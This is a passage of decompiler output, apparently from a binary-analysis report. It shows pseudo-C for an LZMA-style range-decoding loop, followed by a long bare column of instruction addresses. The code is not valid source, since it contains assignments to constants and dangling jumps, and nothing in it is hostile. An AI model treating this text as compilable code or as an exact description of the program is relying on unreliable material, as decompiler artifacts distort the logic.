											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                      0x00000000
                                                                      0x004065c1
                                                                      0x004065c1
                                                                      0x004065c5
                                                                      0x004065ee
                                                                      0x004065f8
                                                                      0x004065c7
                                                                      0x004065d0
                                                                      0x004065dd
                                                                      0x004065e0
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406975
                                                                      0x00406979
                                                                      0x00406b28
                                                                      0x00406b3e
                                                                      0x00406b46
                                                                      0x00406b4d
                                                                      0x00406b4f
                                                                      0x00406b56
                                                                      0x00406b5a
                                                                      0x00406b5a
                                                                      0x00406985
                                                                      0x0040698c
                                                                      0x00406994
                                                                      0x00406997
                                                                      0x0040699a
                                                                      0x0040699a
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x00406145
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00000000
                                                                      0x00406156
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040615f
                                                                      0x00406162
                                                                      0x00406165
                                                                      0x00406169
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040616f
                                                                      0x00406172
                                                                      0x00406174
                                                                      0x00406175
                                                                      0x00406178
                                                                      0x0040617a
                                                                      0x0040617b
                                                                      0x0040617d
                                                                      0x00406180
                                                                      0x00406185
                                                                      0x0040618a
                                                                      0x00406193
                                                                      0x004061a6
                                                                      0x004061a9
                                                                      0x004061b5
                                                                      0x004061dd
                                                                      0x004061df
                                                                      0x004061ed
                                                                      0x004061ed
                                                                      0x004061f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061e1
                                                                      0x004061e4
                                                                      0x004061e5
                                                                      0x004061e5
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061bb
                                                                      0x004061c0
                                                                      0x004061c0
                                                                      0x004061c9
                                                                      0x004061d1
                                                                      0x004061d4
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061f7
                                                                      0x004061f7
                                                                      0x004061fb
                                                                      0x00406aa7
                                                                      0x00000000
                                                                      0x00406aa7
                                                                      0x00406204
                                                                      0x00406214
                                                                      0x00406217
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621d
                                                                      0x00406221
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406223
                                                                      0x00406229
                                                                      0x00406253
                                                                      0x00406259
                                                                      0x00406260
                                                                      0x00000000
                                                                      0x00406260
                                                                      0x0040622f
                                                                      0x00406232
                                                                      0x00406237
                                                                      0x00406237
                                                                      0x00406242
                                                                      0x0040624a
                                                                      0x0040624d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406292
                                                                      0x00406298
                                                                      0x0040629b
                                                                      0x004062a8
                                                                      0x004062b0
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406267
                                                                      0x00406267
                                                                      0x0040626b
                                                                      0x00406ab6
                                                                      0x00000000
                                                                      0x00406ab6
                                                                      0x00406277
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406285
                                                                      0x00406288
                                                                      0x0040628b
                                                                      0x00406290
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062b8
                                                                      0x004062ba
                                                                      0x004062bd
                                                                      0x0040632e
                                                                      0x00406331
                                                                      0x00406334
                                                                      0x0040633b
                                                                      0x00406345
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x004062bf
                                                                      0x004062c3
                                                                      0x004062c6
                                                                      0x004062c8
                                                                      0x004062cb
                                                                      0x004062ce
                                                                      0x004062d0
                                                                      0x004062d3
                                                                      0x004062d5
                                                                      0x004062da
                                                                      0x004062dd
                                                                      0x004062e0
                                                                      0x004062e4
                                                                      0x004062eb
                                                                      0x004062ee
                                                                      0x004062f5
                                                                      0x004062f9
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x00406305
                                                                      0x00406308
                                                                      0x00406326
                                                                      0x00406328
                                                                      0x00000000
                                                                      0x0040630a
                                                                      0x0040630a
                                                                      0x0040630d
                                                                      0x00406310
                                                                      0x00406313
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406318
                                                                      0x0040631b
                                                                      0x0040631d
                                                                      0x0040631e
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406557
                                                                      0x0040655b
                                                                      0x00406579
                                                                      0x0040657c
                                                                      0x00406583
                                                                      0x00406586
                                                                      0x00406589
                                                                      0x0040658c
                                                                      0x0040658f
                                                                      0x00406592
                                                                      0x00406594
                                                                      0x0040659b
                                                                      0x0040659c
                                                                      0x0040659e
                                                                      0x004065a1
                                                                      0x004065a4
                                                                      0x004065a7
                                                                      0x004065a7
                                                                      0x004065ac
                                                                      0x00000000
                                                                      0x004065ac
                                                                      0x0040655d
                                                                      0x00406560
                                                                      0x00406563
                                                                      0x0040656d
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406604
                                                                      0x00406608
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040660e
                                                                      0x00406612
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406618
                                                                      0x0040661a
                                                                      0x0040661e
                                                                      0x0040661e
                                                                      0x00406621
                                                                      0x00406625
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406675
                                                                      0x00406679
                                                                      0x00406680
                                                                      0x00406683
                                                                      0x00406686
                                                                      0x00406690
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x0040667b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040669c
                                                                      0x004066a0
                                                                      0x004066a7
                                                                      0x004066aa
                                                                      0x004066ad
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066b0
                                                                      0x004066b3
                                                                      0x004066b6
                                                                      0x004066b6
                                                                      0x004066b9
                                                                      0x004066bc
                                                                      0x004066bf
                                                                      0x004066bf
                                                                      0x004066c2
                                                                      0x004066c9
                                                                      0x004066ce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040675c
                                                                      0x0040675c
                                                                      0x00406760
                                                                      0x00406afe
                                                                      0x00000000
                                                                      0x00406afe
                                                                      0x00406766
                                                                      0x00406769
                                                                      0x0040676c
                                                                      0x00406770
                                                                      0x00406773
                                                                      0x00406779
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677e
                                                                      0x00406781
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406351
                                                                      0x00406351
                                                                      0x00406355
                                                                      0x00406ac2
                                                                      0x00000000
                                                                      0x00406ac2
                                                                      0x0040635b
                                                                      0x0040635e
                                                                      0x00406361
                                                                      0x00406365
                                                                      0x00406368
                                                                      0x0040636e
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406373
                                                                      0x00406376
                                                                      0x00406376
                                                                      0x00406379
                                                                      0x0040637c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406382
                                                                      0x00406388
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040638e
                                                                      0x0040638e
                                                                      0x00406392
                                                                      0x00406395
                                                                      0x00406398
                                                                      0x0040639b
                                                                      0x0040639e
                                                                      0x0040639f
                                                                      0x004063a2
                                                                      0x004063a4
                                                                      0x004063aa
                                                                      0x004063ad
                                                                      0x004063b0
                                                                      0x004063b3
                                                                      0x004063b6
                                                                      0x004063b9
                                                                      0x004063bc
                                                                      0x004063d8
                                                                      0x004063db
                                                                      0x004063de
                                                                      0x004063e1
                                                                      0x004063e8
                                                                      0x004063ec
                                                                      0x004063ee
                                                                      0x004063f2
                                                                      0x004063be
                                                                      0x004063be
                                                                      0x004063c2
                                                                      0x004063ca
                                                                      0x004063cf
                                                                      0x004063d1
                                                                      0x004063d3
                                                                      0x004063d3
                                                                      0x004063f5
                                                                      0x004063fc
                                                                      0x004063ff
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x0040640a
                                                                      0x0040640a
                                                                      0x0040640e
                                                                      0x00406ace
                                                                      0x00000000
                                                                      0x00406ace
                                                                      0x00406414
                                                                      0x00406417
                                                                      0x0040641a
                                                                      0x0040641e
                                                                      0x00406421
                                                                      0x00406427
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x0040642c
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x00406435
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406437
                                                                      0x0040643a
                                                                      0x0040643d
                                                                      0x00406440
                                                                      0x00406443
                                                                      0x00406446
                                                                      0x00406449
                                                                      0x0040644c
                                                                      0x0040644f
                                                                      0x00406452
                                                                      0x00406455
                                                                      0x0040646d
                                                                      0x00406470
                                                                      0x00406473
                                                                      0x00406476
                                                                      0x00406476
                                                                      0x00406479
                                                                      0x0040647d
                                                                      0x0040647f
                                                                      0x00406457
                                                                      0x00406457
                                                                      0x0040645f
                                                                      0x00406464
                                                                      0x00406466
                                                                      0x00406468
                                                                      0x00406468
                                                                      0x00406482
                                                                      0x00406489
                                                                      0x0040648c
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x0040648c
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064ce
                                                                      0x004064ce
                                                                      0x004064d2
                                                                      0x00406ada
                                                                      0x00000000
                                                                      0x00406ada
                                                                      0x004064d8
                                                                      0x004064db
                                                                      0x004064de
                                                                      0x004064e2
                                                                      0x004064e5
                                                                      0x004064eb
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064f0
                                                                      0x004064f3
                                                                      0x004064f3
                                                                      0x004064f9
                                                                      0x00406497
                                                                      0x00406497
                                                                      0x0040649a
                                                                      0x00000000
                                                                      0x0040649a
                                                                      0x004064fb
                                                                      0x004064fb
                                                                      0x004064fe
                                                                      0x00406501
                                                                      0x00406504
                                                                      0x00406507
                                                                      0x0040650a
                                                                      0x0040650d
                                                                      0x00406510
                                                                      0x00406513
                                                                      0x00406516
                                                                      0x00406519
